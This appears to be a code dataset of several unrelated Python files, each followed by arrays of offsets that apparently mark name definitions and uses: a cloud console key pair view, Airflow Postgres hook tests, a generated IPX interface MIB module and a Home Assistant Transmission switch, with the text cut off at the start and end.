name=keypair.name,
fingerprint=keypair.fingerprint,
))
return dict(results=keypairs)
def get_items(self):
ret = []
if self.conn:
ret = self.conn.get_all_key_pairs()
return ret
class KeyPairView(BaseView):
"""Views for single Key Pair"""
TEMPLATE = '../templates/keypairs/keypair_view.pt'
def __init__(self, request):
super(KeyPairView, self).__init__(request)
keyname = '/'.join(self.request.subpath)
if keyname == 'new':
keyname = _(u'Create')
if keyname == 'new2':
keyname = _(u'Import')
self.title_parts = [_(u'Key Pair'), keyname]
self.conn = self.get_connection()
self.keypair = self.get_keypair()
self.keypair_route_id = '/'.join(self.request.subpath)
self.keypair_form = KeyPairForm(self.request, keypair=self.keypair, formdata=self.request.params or None)
self.keypair_import_form = KeyPairImportForm(
self.request, keypair=self.keypair, formdata=self.request.params or None)
self.delete_form = KeyPairDeleteForm(self.request, formdata=self.request.params or None)
self.new_keypair_created = True if self._has_file_() else False # Detect if session has new keypair material
self.created_msg = _(u'Successfully created key pair {keypair}'.format(keypair=self.keypair_route_id))
controller_options_json = BaseView.escape_json(json.dumps({
'route_id': self.keypair_route_id,
'keypair_created': self.new_keypair_created,
'keypair_created_msg': self.created_msg,
}))
self.render_dict = dict(
keypair=self.keypair,
keypair_name=self.escape_braces(self.keypair.name) if self.keypair else '',
keypair_route_id=self.keypair_route_id,
keypair_form=self.keypair_form,
keypair_import_form=self.keypair_import_form,
keypair_created=self.new_keypair_created,
delete_form=self.delete_form,
keypair_names=self.get_keypair_names(),
controller_options_json=controller_options_json,
)
def get_keypair(self):
keypair_param = '/'.join(self.request.subpath)
if keypair_param == "new" or keypair_param == "new2":
return None
keypairs_param = [keypair_param]
keypairs = []
if self.conn:
try:
keypairs = self.conn.get_all_key_pairs(keynames=keypairs_param)
except BotoServerError:
return None
keypair = keypairs[0] if keypairs else None
return keypair
@view_config(route_name='keypair_view', renderer=TEMPLATE)
def keypair_view(self):
return self.render_dict
def get_keypair_names(self):
keypairs = []
with boto_error_handler(self.request):
if self.conn:
keypairs = [k.name for k in self.conn.get_all_key_pairs()]
return sorted(set(keypairs))
@view_config(route_name='keypair_create', request_method='POST', renderer=TEMPLATE)
def keypair_create(self):
if self.keypair_form.validate():
name = self.request.params.get('name')
location = self.request.route_path('keypair_view', subpath=name)
with boto_error_handler(self.request, location):
self.log_request(_(u"Creating keypair ") + name)
new_keypair = self.conn.create_key_pair(name)
# Store the new keypair material information in the session
self._store_file_(new_keypair.name + ".pem",
'application/x-pem-file;charset=ISO-8859-1',
new_keypair.material)
msg_template = _(u'Successfully created key pair {keypair}')
msg = msg_template.format(keypair=name)
if self.request.is_xhr:
resp_body = json.dumps(dict(message=msg))
return Response(status=200, body=resp_body, content_type='application/x-pem-file;charset=ISO-8859-1')
else:
location = self.request.route_path('keypair_view', subpath=name)
return HTTPFound(location=location)
if self.request.is_xhr:
form_errors = ', '.join(self.keypair_form.get_errors_list())
return JSONResponse(status=400, message=form_errors) # Validation failure = bad request
else:
self.request.error_messages = self.keypair_form.get_errors_list()
return self.render_dict
@view_config(route_name='keypair_import', request_method='POST', renderer=TEMPLATE)
def keypair_import(self):
if self.keypair_form.validate():
name = self.request.params.get('name')
key_material = self.request.params.get('key_material')
# Return to import form if failure
failure_location = self.request.route_path('keypair_view', subpath='new2')
success_location = self.request.route_path('keypair_view', subpath=name)
with boto_error_handler(self.request, failure_location):
self.log_request(_(u"Importing keypair ") + name)
self.conn.import_key_pair(name, key_material)
msg_template = _(u'Successfully imported key pair {keypair}')
msg = msg_template.format(keypair=name)
self.request.session.flash(msg, queue=Notification.SUCCESS)
return HTTPFound(location=success_location)
return self.render_dict
@view_config(route_name='keypair_delete', request_method='POST', renderer=TEMPLATE)
def keypair_delete(self):
if self.delete_form.validate():
keypair_name_param = self.request.params.get('name')
keypair_names = [keypair.strip() for keypair in keypair_name_param.split(',')]
location = self.request.route_path('keypairs')
with boto_error_handler(self.request, location):
for keypair_name in keypair_names:
self.log_request(_(u"Deleting keypair ") + keypair_name)
self.conn.delete_key_pair(keypair_name)
prefix = _(u'Successfully deleted keypair')
if len(keypair_names) == 1:
msg = prefix
else:
msg = u'{0} {1}'.format(prefix, ', '.join(keypair_names))
self.request.session.flash(msg, queue=Notification.SUCCESS)
return HTTPFound(location=location)
return self.render_dict
| [
[
[
1440,
1458
],
[
5114,
5118
],
[
7625,
7629
]
],
[
[
1487,
1502
],
[
6194,
6209
]
],
[
[
1538,
1547
],
[
7895,
7904
],
[
9181,
9190
],
[
10206,
10215
]
],
[
[
1573,
1584
],
[
2235,
2246
],
[
3236,
3247
],
[
6321,
6332
],
[
6686,
6697
],
[
8264,
8275
],
[
9257,
9268
]
],
[
[
1614,
1622
],
[
7678,
7686
]
],
[
[
1653,
1664
],
[
4507,
4518
]
],
[
[
1666,
1683
],
[
4628,
4645
]
],
[
[
1685,
1702
],
[
2120,
2137
],
[
4760,
4777
]
],
[
[
1722,
1723
],
[
2003,
2004
],
[
2655,
2656
],
[
2711,
2712
],
[
4201,
4202
],
[
4266,
4267
],
[
4307,
4308
],
[
4975,
4976
],
[
7062,
7063
],
[
7459,
7460
],
[
8857,
8858
],
[
8983,
8984
],
[
9774,
9775
],
[
9899,
9900
]
],
[
[
1745,
1757
],
[
9140,
9152
],
[
10165,
10177
]
],
[
[
1778,
1786
],
[
3088,
3096
],
[
3914,
3922
],
[
5093,
5101
]
],
[
[
1788,
1803
],
[
1872,
1887
]
],
[
[
1805,
1817
],
[
3402,
3414
],
[
8048,
8060
]
],
[
[
1832,
1850
],
[
3492,
3510
],
[
6508,
6526
],
[
6985,
7003
],
[
8772,
8790
],
[
9642,
9660
]
],
[
[
1859,
1871
],
[
1937,
1949
]
],
[
[
3071,
3087
],
[
3146,
3162
]
],
[
[
3902,
3913
],
[
4064,
4075
]
]
] |
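The @view_config decorators above bind to route names that must be registered elsewhere in the application; the sketch below shows what that registration could look like, where the URL patterns and the scanned dotted path are assumptions rather than the project's actual configuration.
from pyramid.config import Configurator

def includeme(config):
    config.add_route('keypairs', '/keypairs')
    config.add_route('keypairs_json', '/keypairs/json')
    config.add_route('keypair_view', '/keypairs/*subpath')   # request.subpath feeds KeyPairView
    config.add_route('keypair_create', '/keypairs/create')
    config.add_route('keypair_import', '/keypairs/import')
    config.add_route('keypair_delete', '/keypairs/delete')
    config.scan('eucaconsole.views.keypairs')                 # hypothetical dotted path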
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import mock
import unittest
from tempfile import NamedTemporaryFile
import psycopg2.extras
import pytest
from airflow.hooks.postgres_hook import PostgresHook
from airflow.models import Connection
class TestPostgresHookConn(unittest.TestCase):
def setUp(self):
super(TestPostgresHookConn, self).setUp()
self.connection = Connection(
login='login',
password='password',
host='host',
schema='schema'
)
class UnitTestPostgresHook(PostgresHook):
conn_name_attr = 'test_conn_id'
self.db_hook = UnitTestPostgresHook()
self.db_hook.get_connection = mock.Mock()
self.db_hook.get_connection.return_value = self.connection
@mock.patch('airflow.hooks.postgres_hook.psycopg2.connect')
def test_get_conn_non_default_id(self, mock_connect):
self.db_hook.test_conn_id = 'non_default'
self.db_hook.get_conn()
mock_connect.assert_called_once_with(user='login', password='password',
host='host', dbname='schema',
port=None)
self.db_hook.get_connection.assert_called_once_with('non_default')
@mock.patch('airflow.hooks.postgres_hook.psycopg2.connect')
def test_get_conn(self, mock_connect):
self.db_hook.get_conn()
mock_connect.assert_called_once_with(user='login', password='password', host='host',
dbname='schema', port=None)
@mock.patch('airflow.hooks.postgres_hook.psycopg2.connect')
def test_get_conn_cursor(self, mock_connect):
self.connection.extra = '{"cursor": "dictcursor"}'
self.db_hook.get_conn()
mock_connect.assert_called_once_with(cursor_factory=psycopg2.extras.DictCursor,
user='login', password='password', host='host',
dbname='schema', port=None)
@mock.patch('airflow.hooks.postgres_hook.psycopg2.connect')
def test_get_conn_with_invalid_cursor(self, mock_connect):
self.connection.extra = '{"cursor": "mycursor"}'
with self.assertRaises(ValueError):
self.db_hook.get_conn()
@mock.patch('airflow.hooks.postgres_hook.psycopg2.connect')
@mock.patch('airflow.contrib.hooks.aws_hook.AwsHook.get_client_type')
def test_get_conn_rds_iam_postgres(self, mock_client, mock_connect):
self.connection.extra = '{"iam":true}'
mock_client.return_value.generate_db_auth_token.return_value = 'aws_token'
self.db_hook.get_conn()
mock_connect.assert_called_once_with(user='login', password='aws_token', host='host',
dbname='schema', port=5432)
@mock.patch('airflow.hooks.postgres_hook.psycopg2.connect')
@mock.patch('airflow.contrib.hooks.aws_hook.AwsHook.get_client_type')
def test_get_conn_rds_iam_redshift(self, mock_client, mock_connect):
self.connection.extra = '{"iam":true, "redshift":true}'
self.connection.host = 'cluster-identifier.ccdfre4hpd39h.us-east-1.redshift.amazonaws.com'
login = 'IAM:{login}'.format(login=self.connection.login)
mock_client.return_value.get_cluster_credentials.return_value = {'DbPassword': 'aws_token',
'DbUser': login}
self.db_hook.get_conn()
mock_connect.assert_called_once_with(user=login, password='aws_token', host=self.connection.host,
dbname='schema', port=5439)
class TestPostgresHook(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(TestPostgresHook, self).__init__(*args, **kwargs)
self.table = "test_postgres_hook_table"
def setUp(self):
super(TestPostgresHook, self).setUp()
self.cur = mock.MagicMock()
self.conn = conn = mock.MagicMock()
self.conn.cursor.return_value = self.cur
class UnitTestPostgresHook(PostgresHook):
conn_name_attr = 'test_conn_id'
def get_conn(self):
return conn
self.db_hook = UnitTestPostgresHook()
def tearDown(self):
super(TestPostgresHook, self).tearDown()
with PostgresHook().get_conn() as conn:
with conn.cursor() as cur:
cur.execute("DROP TABLE IF EXISTS {}".format(self.table))
@pytest.mark.backend("postgres")
def test_copy_expert(self):
m = mock.mock_open(read_data='{"some": "json"}')
with mock.patch('airflow.hooks.postgres_hook.open', m):
statement = "SQL"
filename = "filename"
self.cur.fetchall.return_value = None
self.assertEqual(None, self.db_hook.copy_expert(statement, filename, open=m))
assert self.conn.close.call_count == 1
assert self.cur.close.call_count == 1
assert self.conn.commit.call_count == 1
self.cur.copy_expert.assert_called_once_with(statement, m.return_value)
self.assertEqual(m.call_args[0], (filename, "r+"))
@pytest.mark.backend("postgres")
def test_bulk_load(self):
hook = PostgresHook()
input_data = ["foo", "bar", "baz"]
with hook.get_conn() as conn:
with conn.cursor() as cur:
cur.execute("CREATE TABLE {} (c VARCHAR)".format(self.table))
conn.commit()
with NamedTemporaryFile() as f:
f.write("\n".join(input_data).encode("utf-8"))
f.flush()
hook.bulk_load(self.table, f.name)
cur.execute("SELECT * FROM {}".format(self.table))
results = [row[0] for row in cur.fetchall()]
self.assertEqual(sorted(input_data), sorted(results))
@pytest.mark.backend("postgres")
def test_bulk_dump(self):
hook = PostgresHook()
input_data = ["foo", "bar", "baz"]
with hook.get_conn() as conn:
with conn.cursor() as cur:
cur.execute("CREATE TABLE {} (c VARCHAR)".format(self.table))
values = ",".join("('{}')".format(data) for data in input_data)
cur.execute("INSERT INTO {} VALUES {}".format(self.table, values))
conn.commit()
with NamedTemporaryFile() as f:
hook.bulk_dump(self.table, f.name)
f.seek(0)
results = [line.rstrip().decode("utf-8") for line in f.readlines()]
self.assertEqual(sorted(input_data), sorted(results))
| [
[
[
821,
825
],
[
1561,
1565
],
[
2052,
2056
],
[
2358,
2362
],
[
2818,
2822
],
[
3083,
3087
],
[
3147,
3151
],
[
3624,
3628
],
[
3688,
3692
],
[
1476,
1480
],
[
4747,
4751
],
[
4791,
4795
],
[
5378,
5382
],
[
5436,
5440
]
],
[
[
833,
841
],
[
1042,
1050
],
[
4485,
4493
]
],
[
[
864,
882
],
[
6343,
6361
],
[
7226,
7244
]
],
[
[
891,
906
],
[
2618,
2626
]
],
[
[
914,
920
],
[
5302,
5308
],
[
6000,
6006
],
[
6720,
6726
]
],
[
[
962,
974
],
[
1332,
1344
],
[
4893,
4905
],
[
5148,
5160
],
[
6077,
6089
],
[
6797,
6809
]
],
[
[
1002,
1012
],
[
1161,
1171
]
],
[
[
1021,
1041
],
[
1098,
1118
]
],
[
[
4468,
4484
],
[
4561,
4577
],
[
4695,
4711
],
[
5099,
5115
]
]
] |
from .idw import inverse_distance_weighting
| [[[17, 43]]] |
#
# PySNMP MIB module IPX-INTERFACE-MANAGEMENT-PRIVATE-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/IPX-INTERFACE-MANAGEMENT-PRIVATE-MIB
# Produced by pysmi-0.3.4 at Wed May 1 13:56:57 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsUnion, SingleValueConstraint, ValueSizeConstraint, ConstraintsIntersection, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsUnion", "SingleValueConstraint", "ValueSizeConstraint", "ConstraintsIntersection", "ValueRangeConstraint")
cjnMgmt, = mibBuilder.importSymbols("Cajun-ROOT", "cjnMgmt")
NetNumber, = mibBuilder.importSymbols("IPX-PRIVATE-MIB", "NetNumber")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
Counter32, Bits, Unsigned32, Gauge32, IpAddress, ObjectIdentity, Integer32, NotificationType, MibIdentifier, TimeTicks, MibScalar, MibTable, MibTableRow, MibTableColumn, ModuleIdentity, Counter64, iso = mibBuilder.importSymbols("SNMPv2-SMI", "Counter32", "Bits", "Unsigned32", "Gauge32", "IpAddress", "ObjectIdentity", "Integer32", "NotificationType", "MibIdentifier", "TimeTicks", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "ModuleIdentity", "Counter64", "iso")
DisplayString, RowStatus, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "RowStatus", "TextualConvention")
cjnIpxIfMgmt = ModuleIdentity((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2))
if mibBuilder.loadTexts: cjnIpxIfMgmt.setLastUpdated('9904010000Z')
if mibBuilder.loadTexts: cjnIpxIfMgmt.setOrganization("Lucent's Concord Technology Center (CTC)")
if mibBuilder.loadTexts: cjnIpxIfMgmt.setContactInfo('Marc Cochran -- mcochran@lucent.com')
if mibBuilder.loadTexts: cjnIpxIfMgmt.setDescription('Cajun Private IPX Interface Management MIB')
cjnIpxIfGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1))
cjnIpxIfNextIndex = MibScalar((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cjnIpxIfNextIndex.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfNextIndex.setDescription('The next available IfIndex. This number should be used to create new rows in the IpxIfTable.')
cjnIpxIfNumber = MibScalar((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cjnIpxIfNumber.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfNumber.setDescription('The number of IPX interfaces.')
cjnIpxIfTable = MibTable((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3), )
if mibBuilder.loadTexts: cjnIpxIfTable.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfTable.setDescription('A list of Cajun IPX interface entries. The number of entries is given by the value of cjnIpxIfNumber.')
cjnIpxIfEntry = MibTableRow((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1), ).setIndexNames((0, "IPX-INTERFACE-MANAGEMENT-PRIVATE-MIB", "cjnIpxIfIndex"))
if mibBuilder.loadTexts: cjnIpxIfEntry.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfEntry.setDescription('A Cajun IPX interface instance.')
cjnIpxIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cjnIpxIfIndex.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfIndex.setDescription("The globally unique identifier for this interface. This number MUST correlate with the IfTable's IfIndex in MIB-II or RFC2233.")
cjnIpxIfRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1, 2), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cjnIpxIfRowStatus.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfRowStatus.setDescription('The status of this row, by which new entries may be created, or old entries deleted from this table.')
cjnIpxIfNetNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1, 3), NetNumber()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cjnIpxIfNetNumber.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfNetNumber.setDescription('The IPX network number associated with this IPX interface.')
cjnIpxIfEncapsType = MibTableColumn((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("ethernetV2", 1), ("ethernet8022", 2), ("ethernetSNAP", 3), ("ethernet8023", 4))).clone('ethernetV2')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cjnIpxIfEncapsType.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfEncapsType.setDescription('The Ethernet encapsulation type used on this IPX interface.')
cjnIpxIfVlanIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1, 5), Integer32()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cjnIpxIfVlanIfIndex.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfVlanIfIndex.setDescription("The interface index of the VLAN for this interface. This number MUST correlate with the IfTable's IfIndex in MIB-II or RFC2233.")
cjnIpxIfName = MibTableColumn((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1, 6), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 31))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cjnIpxIfName.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfName.setDescription('The protocol unique name associated with this interface. This name is limited to 31 characters and may appear in other protocol interface entries such as IP and Appletalk but MAY NOT be duplicated within the cjnIpxIfTable. In other words, other protocols can use this interface name but IPX may only have this name associated with one interface.')
cjnIpxIfTicks = MibTableColumn((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1, 7), Integer32().clone(1)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cjnIpxIfTicks.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfTicks.setDescription('The period of time, in ticks, that it takes to transmit one byte of data, excluding protocol headers, to a destination on the other end of the circuit, if the circuit is free of other traffic.')
cjnIpxIfType20RbcastMode = MibTableColumn((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("disabled", 1), ("inbound", 2), ("outbound", 3), ("both", 4))).clone('disabled')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cjnIpxIfType20RbcastMode.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfType20RbcastMode.setDescription('The handling of NetBIOS Type 20 packets on the interface. If set to disabled(1), Type 20 packets are neither sent nor received on the interface. If set to inbound(2), Type 20 packets may be received but not sent. If set to outbound(3), Type 20 packets may be sent on the interface but not received. If set to both(4), Type 20 packets may be sent and received.')
cjnIpxIfAdminStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1, 9), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("up", 1), ("down", 2), ("testing", 3)))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cjnIpxIfAdminStatus.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfAdminStatus.setDescription('The administrative state of this interface. The testing(3) state indicates that no operational packets can be passed. When a managed system initializes, all interfaces start with ifAdminStatus in the down(2) state. As a result of either explicit management action or per configuration information retained by the managed system, ifAdminStatus is then changed to either the up(1) or testing(3) states (or remains in the down(2) state).')
cjnIpxIfOperStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1, 10), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("up", 1), ("down", 2), ("testing", 3), ("lowerLayerDown", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cjnIpxIfOperStatus.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfOperStatus.setDescription('The current operational state of this interface. The testing(3) state indicates that no operational packets can be passed. If cjnIpxIfAdminStatus is down(2) then cjnIpxIfOperStatus should be down(2). If cjnIpxIfAdminStatus is up(1) then cjnIpxIfOperStatus should change to up(1) if the interface is ready to transmit and receive network traffic; it should change to lowerLayerDown(4) if the interface is waiting for external actions (such as a port on the VLAN associated with the interface becoming operational).')
mibBuilder.exportSymbols("IPX-INTERFACE-MANAGEMENT-PRIVATE-MIB", cjnIpxIfNextIndex=cjnIpxIfNextIndex, cjnIpxIfTable=cjnIpxIfTable, cjnIpxIfAdminStatus=cjnIpxIfAdminStatus, cjnIpxIfMgmt=cjnIpxIfMgmt, cjnIpxIfEncapsType=cjnIpxIfEncapsType, cjnIpxIfName=cjnIpxIfName, cjnIpxIfNetNumber=cjnIpxIfNetNumber, cjnIpxIfRowStatus=cjnIpxIfRowStatus, cjnIpxIfTicks=cjnIpxIfTicks, cjnIpxIfVlanIfIndex=cjnIpxIfVlanIfIndex, cjnIpxIfType20RbcastMode=cjnIpxIfType20RbcastMode, cjnIpxIfGroup=cjnIpxIfGroup, cjnIpxIfOperStatus=cjnIpxIfOperStatus, cjnIpxIfIndex=cjnIpxIfIndex, cjnIpxIfEntry=cjnIpxIfEntry, PYSNMP_MODULE_ID=cjnIpxIfMgmt, cjnIpxIfNumber=cjnIpxIfNumber)
| [
[
[
382,
393
]
],
[
[
395,
411
]
],
[
[
413,
420
]
],
[
[
502,
513
],
[
4611,
4622
],
[
6597,
6608
],
[
7406,
7417
],
[
8242,
8253
]
],
[
[
577,
593
],
[
4540,
4556
],
[
6526,
6542
],
[
7338,
7354
],
[
8171,
8187
]
],
[
[
595,
616
],
[
4557,
4578
],
[
6543,
6564
],
[
7355,
7376
],
[
8188,
8209
]
],
[
[
618,
637
],
[
5443,
5462
]
],
[
[
639,
662
]
],
[
[
664,
684
]
],
[
[
850,
857
]
],
[
[
911,
920
],
[
4197,
4206
]
],
[
[
981,
998
]
],
[
[
1000,
1016
]
],
[
[
1100,
1109
]
],
[
[
1111,
1115
]
],
[
[
1117,
1127
]
],
[
[
1129,
1136
]
],
[
[
1138,
1147
]
],
[
[
1149,
1163
]
],
[
[
1165,
1174
],
[
2286,
2295
],
[
2614,
2623
],
[
3477,
3486
],
[
4508,
4517
],
[
5029,
5038
],
[
6042,
6051
],
[
6494,
6503
],
[
7306,
7315
],
[
8139,
8148
]
],
[
[
1176,
1192
]
],
[
[
1194,
1207
],
[
2155,
2168
]
],
[
[
1209,
1218
]
],
[
[
1220,
1229
],
[
2231,
2240
],
[
2559,
2568
]
],
[
[
1231,
1239
],
[
2817,
2825
]
],
[
[
1241,
1252
],
[
3108,
3119
]
],
[
[
1254,
1268
],
[
3411,
3425
],
[
3779,
3793
],
[
4131,
4145
],
[
4442,
4456
],
[
4963,
4977
],
[
5341,
5355
],
[
5976,
5990
],
[
6428,
6442
],
[
7240,
7254
],
[
8072,
8086
]
],
[
[
1270,
1284
],
[
1728,
1742
]
],
[
[
1286,
1295
]
],
[
[
1297,
1300
]
],
[
[
1578,
1591
],
[
5407,
5420
]
],
[
[
1593,
1602
],
[
3845,
3854
]
],
[
[
1604,
1621
]
],
[
[
1713,
1725
],
[
1807,
1819
],
[
1875,
1887
],
[
1973,
1985
],
[
2065,
2077
],
[
9170,
9182
],
[
9588,
9600
]
],
[
[
2139,
2152
],
[
9459,
9472
]
],
[
[
2211,
2228
],
[
2349,
2366
],
[
2413,
2430
],
[
9068,
9085
]
],
[
[
2542,
2556
],
[
2677,
2691
],
[
2738,
2752
],
[
9617,
9631
]
],
[
[
2801,
2814
],
[
2898,
2911
],
[
2958,
2971
],
[
9101,
9114
]
],
[
[
3092,
3105
],
[
3271,
3284
],
[
3331,
3344
],
[
9556,
9569
]
],
[
[
3395,
3408
],
[
3540,
3553
],
[
3600,
3613
],
[
9527,
9540
]
],
[
[
3759,
3776
],
[
3910,
3927
],
[
3974,
3991
],
[
9305,
9322
]
],
[
[
4111,
4128
],
[
4262,
4279
],
[
4326,
4343
],
[
9268,
9285
]
],
[
[
4421,
4439
],
[
4779,
4797
],
[
4844,
4862
],
[
9203,
9221
]
],
[
[
4941,
4960
],
[
5094,
5113
],
[
5160,
5179
],
[
9373,
9392
]
],
[
[
5326,
5338
],
[
5524,
5536
],
[
5583,
5595
],
[
9236,
9248
]
],
[
[
5960,
5973
],
[
6116,
6129
],
[
6176,
6189
],
[
9338,
9351
]
],
[
[
6401,
6425
],
[
6744,
6768
],
[
6815,
6839
],
[
9419,
9443
]
],
[
[
7218,
7237
],
[
7512,
7531
],
[
7578,
7597
],
[
9136,
9155
]
],
[
[
8051,
8069
],
[
8369,
8387
],
[
8434,
8452
],
[
9493,
9511
]
]
] |
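A sketch of loading this generated module with pysnmp's MIB builder; the directory is a placeholder and assumes the file is saved as IPX-INTERFACE-MANAGEMENT-PRIVATE-MIB.py on the builder's search path.
from pysnmp.smi import builder

mib_builder = builder.MibBuilder()
mib_builder.addMibSources(builder.DirMibSource('/path/to/compiled/mibs'))
mib_builder.loadModules('IPX-INTERFACE-MANAGEMENT-PRIVATE-MIB')
(cjn_ipx_if_table,) = mib_builder.importSymbols(
    'IPX-INTERFACE-MANAGEMENT-PRIVATE-MIB', 'cjnIpxIfTable')
print(cjn_ipx_if_table.getName())   # the table's OID tuple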
"""Support for setting the Transmission BitTorrent client Turtle Mode."""
import logging
from homeassistant.const import CONF_NAME, STATE_OFF, STATE_ON
from homeassistant.core import callback
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from homeassistant.helpers.entity import ToggleEntity
from .const import DOMAIN, SWITCH_TYPES
_LOGGING = logging.getLogger(__name__)
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up the Transmission switch."""
tm_client = hass.data[DOMAIN][config_entry.entry_id]
name = config_entry.data[CONF_NAME]
dev = []
for switch_type, switch_name in SWITCH_TYPES.items():
dev.append(TransmissionSwitch(switch_type, switch_name, tm_client, name))
async_add_entities(dev, True)
class TransmissionSwitch(ToggleEntity):
"""Representation of a Transmission switch."""
def __init__(self, switch_type, switch_name, tm_client, name):
"""Initialize the Transmission switch."""
self._name = switch_name
self.client_name = name
self.type = switch_type
self._tm_client = tm_client
self._state = STATE_OFF
self._data = None
self.unsub_update = None
@property
def name(self):
"""Return the name of the switch."""
return f"{self.client_name} {self._name}"
@property
def unique_id(self):
"""Return the unique id of the entity."""
return f"{self._tm_client.api.host}-{self.name}"
@property
def should_poll(self):
"""Poll for status regularly."""
return False
@property
def is_on(self):
"""Return true if device is on."""
return self._state == STATE_ON
@property
def available(self):
"""Could the device be accessed during the last update call."""
return self._tm_client.api.available
def turn_on(self, **kwargs):
"""Turn the device on."""
if self.type == "on_off":
_LOGGING.debug("Starting all torrents")
self._tm_client.api.start_torrents()
elif self.type == "turtle_mode":
_LOGGING.debug("Turning Turtle Mode of Transmission on")
self._tm_client.api.set_alt_speed_enabled(True)
self._tm_client.api.update()
def turn_off(self, **kwargs):
"""Turn the device off."""
if self.type == "on_off":
_LOGGING.debug("Stopping all torrents")
self._tm_client.api.stop_torrents()
if self.type == "turtle_mode":
_LOGGING.debug("Turning Turtle Mode of Transmission off")
self._tm_client.api.set_alt_speed_enabled(False)
self._tm_client.api.update()
async def async_added_to_hass(self):
"""Handle entity which will be added."""
self.unsub_update = async_dispatcher_connect(
self.hass,
self._tm_client.api.signal_update,
self._schedule_immediate_update,
)
@callback
def _schedule_immediate_update(self):
self.async_schedule_update_ha_state(True)
async def will_remove_from_hass(self):
"""Unsubscribe from update dispatcher."""
if self.unsub_update:
self.unsub_update()
self.unsub_update = None
def update(self):
"""Get the latest data from Transmission and updates the state."""
active = None
if self.type == "on_off":
self._data = self._tm_client.api.data
if self._data:
active = self._data.activeTorrentCount > 0
elif self.type == "turtle_mode":
active = self._tm_client.api.get_alt_speed_enabled()
if active is None:
return
self._state = STATE_ON if active else STATE_OFF
| [
[
[
81,
88
],
[
370,
377
]
],
[
[
122,
131
],
[
598,
607
]
],
[
[
133,
142
],
[
1164,
1173
],
[
3771,
3780
]
],
[
[
144,
152
],
[
1723,
